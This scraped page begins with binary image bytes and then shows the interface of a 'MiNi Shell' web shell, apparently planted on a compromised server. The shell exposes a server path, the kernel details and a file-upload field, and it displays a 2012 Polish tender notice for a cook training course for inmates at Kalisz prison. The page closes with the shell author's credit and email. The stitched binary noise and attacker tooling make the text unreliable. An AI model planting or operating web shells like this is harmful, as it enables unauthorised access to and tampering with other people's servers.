JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121123/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121123/469486-N-2012.html

<p class="kh_header"><b>Kalisz: Przetarg nieograniczonyna usługę szkolenia kursowego dla osób pozbawionych wolności, w zakresie przeprowadzania kursu kucharz</b><br>
<b>Numer ogłoszenia: 469486 - 2012; data zamieszczenia: 23.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny Kalisz , ul. Łódzka 2, 62-800 Kalisz, woj. wielkopolskie, tel. 0-62 7654100, 7654104, faks 0-62 7654110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna niemająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczonyna usługę szkolenia kursowego dla osób pozbawionych wolności, w zakresie przeprowadzania kursu kucharz.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  usługa szkolenia kursowego dla osób pozbawionych wolności,
w zakresie    przeprowadzenia kursu  Kucharz.

Kurs  Kucharz  umożliwiający uzyskanie i uzupełnienie wiedzy, umiejętności i kwalifikacji zawodowych    Kod CPV: 80530000-8
a) ilość kursów - 1 (jeden)
b) ilość osób do przeszkolenia - 12
c) czas trwania kursu - 90 godzin  lekcyjnych, w tym: ilość godzin szkolenia teoretycznego 30 h, ilość godzin szkolenia praktycznego  60 h.
Celem kursu jest  umożliwienie  uzyskania i uzupełnienia wiedzy, umiejętności i kwalifikacji zawodowych osobom  pozbawionym wolności,  oraz przygotowanie ich do powrotu na rynek pracy po okresie zakończenia odbywania kary pozbawienia wolności.
 Program kursu  powinien obejmować co najmniej następujące zagadnienia:
a) Podstawy żywienia człowieka 
b) Planowanie, rozliczanie i kalkulacja produkcji potraw
c) Higiena i ochrona zdrowia
d) Technologia robót- obróbka wstępna i termiczna produktów i półprodutktów  żywnościowych
e) Technologia robót- sporządzanie surówek
f) Technologia robót - sporządzanie potraw z mleka i jego przetworów 
g) Technologia robót - sporządzanie potraw z jaj, z mąki, z kasz
h) Technologia robót - sporządzanie zup i sosów gorących
i) Technologia robót - sporządzanie potraw  z różnego rodzaju mięs oraz potraw półmięsnych
j) Technologia robót - sporządzanie wyrobów garmażeryjnych i sosów zimnych
k) Technologia robót - sporządzanie podstawowych deserów i koktajli
l) Technologia robót - sporządzanie potraw dietetycznych
m) Technologia robót - sporządzanie potraw z wykorzystaniem żywności wygodnej
n) Typowe potrawy kuchni staropolskiej i kuchni regionalnej
o) Sposób podawania i dekorowania różnych potraw
p) Organizacja pracy
r) Zajęcia praktyczne
Szczegółowe warunki realizacji przedmiotu zamówienia dotyczące kursu Kucharz
Miejsce realizacji przedmiotu zamówienia: Zakład Karny w Kaliszu ul. Łódzka 2, 62-800 Kalisz. Miejsce odbywania zajęć wskaże Zamawiający.
 Zamawiający przekaże Wykonawcy w dniu podpisania Umowy ilościowy wykaz uczestników kursów, a wszelkie dane osobowe niezbędne do prowadzenia szkoleń Wykonawca powinien gromadzić bezpośrednio od osadzonych objętych wsparciem z chwilą rozpoczęcia zajęć z uwzględnieniem zasad ochrony danych osobowych. Zamawiający zobowiązany jest do posiadania listy rezerwowej uczestników, umożliwiającej łatwe wprowadzenie nowej osoby na miejsce osoby rezygnującej.  Nową osobę z listy rezerwowej uczestników wprowadza się wówczas, gdy zostanie zachowana proporcja umożliwienia  nowej osobie udziału w co najmniej 80 % zajęciach objętych programem nauczania. 
Zamawiający prowadzi ewidencję czasu osób przeprowadzających szkolenia kursowe, 
w szczególności wykładowców i trenerów.
 Składając ofertę o udzielenie zamówienia, Wykonawca sporządza i przedkłada Zamawiającemu program nauczania dla danej formy kształcenia, który powinien spełniać wymagania określone w  § 22 rozporządzenia Ministra Edukacji Narodowej z dnia  11 stycznia 2012r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (DZ.U. nr 34, poz. 186)
 Program szkolenia powinien  obejmować, co najmniej zagadnienia określone w pkt. 3.1.2
Szczegółowy program szkolenia powinien zawierać:
a) nazwę formy kształcenia 
b) czas trwania, liczbę godzin kształcenia i sposób jej organizacji
c)wymagania wstępne dla uczestników,
d) cele kształcenia i sposoby ich osiągania
e) plan nauczania określający nazwę zajęć oraz ich wymiar, 
f) treści nauczania w zakresie poszczególnych zajęć, 
g) opis efektów kształcenia, 
h) wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych
i) sposób i formę zaliczenia.. 
 Maksymalna dzienna liczba godzin kursu nie może przekroczyć 10 godzin lekcyjnych. Przyjmuje się, że jedna godzina lekcyjna trwa  45 minut. Co trzy godziny lekcyjne planowane są ok. 5 -minutowe przerwy, ewentualnie  przerwa na obiad od godz.12:45 do 13:45.
 Wykonawca zobowiązuje się przedstawić Zamawiającemu przed rozpoczęciem zajęć, szczegółowy harmonogram realizacji zajęć - najpóźniej w ciągu 2 dni od daty podpisania  umowy. Harmonogram ten wymaga zatwierdzenia przez Zamawiającego. 
 Warunkiem rozpoczęcia przez osadzonego udziału w kursie Kucharz jest uzyskanie przez niego orzeczenia lekarskiego o braku przeciwwskazań do wykonywania pracy, do której osadzony uzyskuje przygotowanie w wyniku ukończenia kursu.  Wymagane badania lekarskie osób pozbawionych wolności,  zgłoszonych do udziału w kursach, odbędą się w siedzibie Zamawiającego przed rozpoczęciem kursu na koszt Wykonawcy. 
 Wykonawca zobowiązuje się, na własny koszt, ubezpieczyć uczestników kursu od następstw nieszczęśliwych wypadków (NNW) w niezbędnym zakresie przy sumie ubezpieczenia nie mniejszej niż  7 000,00 zł, powstałych w związku ze szkoleniem skazanych. Kopie polis ubezpieczeniowych (dokumentu potwierdzającego dokonanie opłat z tytułu ubezpieczenia od następstw nieszczęśliwych wypadków) Wykonawca przedstawi Zamawiającemu przed rozpoczęciem zajęć. 
 Wykonawca na własny koszt zapewni w ramach zajęć  teoretycznych prowadzonych na kursie kucharz:
a) wykładowców posiadających wymagane prawem kwalifikacje do prowadzenia kształcenia, 
b) dla każdego uczestnika kursu: podręcznik (ewentualnie skrypty) oraz niezbędne materiały papiernicze, które po zakończeniu kursu stają się własnością uczestnika.  Wszystkie materiały szkoleniowe zostaną przekazane uczestnikom kursu najpóźniej w ciągu dwóch dni od rozpoczęcia szkolenia,

 Zamawiający, w zakresie zajęć teoretycznych prowadzonych na kursie, zapewni pomieszczenia wraz z wyposażeniem w sprzęt, posiadane pomoce dydaktyczne, multimedia dostosowane do potrzeb określonego szkolenia, przepisów ppoż, BHP i ergonomii, które znajdują się w Zakładzie Karnym w Kaliszu.
 Wykonawca, w zakresie zajęć praktycznych prowadzonych na kursie,  zapewnia w ramach kosztów wliczonych w usługę szkolenia:
a) kadrę dydaktyczną posiadająca odpowiednie kwalifikacje zawodowe do prowadzonego kształcenia, instruktorów praktycznej nauki zawodu, 
b) materiały do praktycznej nauki, w takiej ilości, która pozwoli na prawidłowe przeprowadzenie zajęć praktycznych z zastrzeżeniem, że koszt materiałów przeznaczonych do praktycznej nauki zawodu będzie w przedziale 30 - 40 procent kosztu ogólnego danego kursu, przy czym wymagane jest, by Wykonawca odpowiednio udokumentował wykorzystanie materiałów służących do praktycznej nauki osadzonych, które powinny być adekwatne do charakteru realizowanego szkolenia i pozwalać na nabycie przez osadzonych zakładanych umiejętności. 
c) odzież ochronną dla każdego uczestnika kursu; stającą się własnością Zamawiającego po zakończeniu kursu,
d) dostawę do Zamawiającego materiałów do praktycznej nauki,  niezbędnych na potrzeby realizacji praktycznej części kursu,
e) że pozostałe po zakończeniu kursu, narzędzia zużywalne do praktycznej nauki zawodu, zakupione ze środków przeznaczonych na realizację kursu, stanowią własność Zamawiającego

 Zamawiający, w zakresie zajęć praktycznych, zapewnia miejsce do ich realizacji, sprzęt niezbędny do przeprowadzenia szkolenia. 
 Miejsce odbywania się zajęć praktycznych wskazuje Zamawiający. 
 Wykonawca na własny koszt prowadzi dokumentację prowadzonego kształcenia.  
Dokumentacja prowadzonego kształcenia obejmuje;
a) program nauczania,
b) dziennik zajęć edukacyjnych zawierający: imiona i nazwiska uczestników,   imienną listę obecności podpisywaną przez uczestników szkolenia; liczbę godzin zajęć, tematy zajęć;
c) protokół z przeprowadzonego zaliczenia,
d) ewidencję wydanych zaświadczeń, zawierającą:  imię i nazwisko, adres zamieszkania oraz numer PESEL (w przypadku osoby, która nie posiada numeru PESEL - numer dokumentu potwierdzającego jej tożsamość), datę wydania zaświadczenia, numer zaświadczenie, potwierdzenie odbioru zaświadczenia, 
e) potwierdzenie odbioru przez uczestników materiałów szkoleniowych.

 Osoba, która ukończyła kurs otrzymuje zaświadczenie o ukończeniu. Wzór zaświadczenia określa załącznik nr 5 do rozporządzenia Ministra Edukacji Narodowej z dnia  11 stycznia 2012r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (DZ.U. nr 34, poz. 186). Zaświadczenie o ukończeniu kursu wydaje na własny koszt Wykonawca. 
 Po zakończeniu kursu Wykonawca na własny koszt  przedkłada Zamawiającemu potwierdzone za zgodność z oryginałem kopie dokumentacji szkoleniowej (nauczania), a także potwierdzone za zgodność z oryginałem kopie wydanych zaświadczeń o ukończeniu kursu (po 2 kopie zaświadczenia dla każdego uczestnika kursu) oraz listy obecności uczestników szkolenia (lub potwierdzone za zgodność z oryginałem kopie list obecności), podpisane przez kierownika instytucji szkoleniowej lub upoważnionego pracownika, z uwzględnieniem obowiązujących zasad ochrony danych osobowych.
 Po zakończeniu kursu, Wykonawca na własny koszt  jest zobowiązany do przeprowadzenia ewaluacji szkolenia. Formularz ankiety oceniającej szkolenie przygotowuje Wykonawca. Wypełnione przez uczestników ankiety (lub ich kopie) wraz z analizą ankiet Wykonawca przedkłada Zamawiającemu po zakończeniu szkolenia kursowego.
 Zamawiający dokonuje protokolarnego odbioru wykonania usług szkolenia kursowego. Protokół odbioru usług szkoleniowych podpisują osoba reprezentująca Zamawiającego i osoba reprezentująca Wykonawcę. Podpisanie protokołu odbioru usług szkoleniowych stanowi moment zrealizowania zamówienia.
 Wykonawca po zrealizowaniu usługi w zakresie przeprowadzenia kursu Kucharz  wystawi fakturę VAT (rachunek). 
  W przypadku nie przystąpienia lub nie ukończenia kursu przez uczestnika, wynagrodzenie za tego uczestnika nie przysługuje, jeżeli Wykonawca ponosi winę za nie ukończenie lub nie przystąpienie  uczestnika do danego kursu.
 Należność za zrealizowany kurs  będzie płatna przelewem na rachunek bankowy Wykonawcy w ciągu 30 dni od daty przedstawienia prawidłowo wystawionej faktury VAT (rachunku). 
 Wykonawca jest zobowiązany do realizacji przedmiotu zamówienia w całości, bez możliwości powierzania innym podmiotom realizacji przedmiotu zamówienia lub jego części.
 Bieżąca kontrola realizacji zamówienia może być przeprowadzona przez jednostkę organizacyjną SW, Okręgowy Inspektorat SW lub Centralny Zarząd SW..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wypełniony, podpisany i opieczętowany formularz ofertowy na  druku stanowiącym załącznik  nr 1 do SIWZ,
 Wypełniony, podpisany i opieczętowany preliminarz kosztów usługi szkoleniowej  na  druku stanowiącym załącznik  nr 2 do SIWZ,
 Parafowany przez osobę upoważnioną do zawierania umów w imieniu Wykonawcy,  wzór umowy stanowiącej załącznik nr  3  do SIWZ,
  Pełnomocnictwo lub upoważnienie do podpisywania dokumentów i umów, których przedmiotem są usługi szkoleniowe (jeżeli  Wykonawcę reprezentuje pełnomocnik).
 Oświadczenie  o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 i 24 ustawy  i  wzorem stanowiącym załącznik nr  4 do SIWZ,
 Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru 
w celu wykazania braku podstaw do wykluczenia w oparciu o art.24 ust.1 pkt.2 ustawy z dnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca składa oświadczenie o spełnieniu warunków udziału w postępowaniu załącznik nr 4 do siwz</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca składa oświadczenie o spełnieniu warunków udziału w postępowaniu załącznik nr 4 do siwz</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca składa oświadczenie o spełnieniu warunków udziału w postępowaniu załącznik nr 4 do siwz</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca składa oświadczenie o spełnieniu warunków udziału w postępowaniu załącznik nr 4 do siwz</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie o posiadaniu aktualnego wpisu do rejestru instytucji szkoleniowych załącznik nr 5 do SIWZ
Oświadczenie o posiadaniu aktualnego wpisu do ewidencji niepublicznych placówek oświatowych załącznik nr 5a do SIWZ
Oświadczenie o posiadaniu decyzji właściwego miejscowo kuratora oświaty o przyznaniu akredytacji załącznik nr 6 do SIWZ
Oświadczenie o dysponowaniu sprzętem do wykonania zamówienia oraz posiadaniu odpowiedniego potencjału ekonomicznego załącznik nr 7 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> dział penitencjarny
Zakładu Karnego w Kaliszu
ul Łódzka 2 62-800 Kalisz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.12.2012 godzina 10:00, miejsce: sekretariat Zakładu Karnego w Kaliszu
ul. Łódzka 2, 62-800 Kalisz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com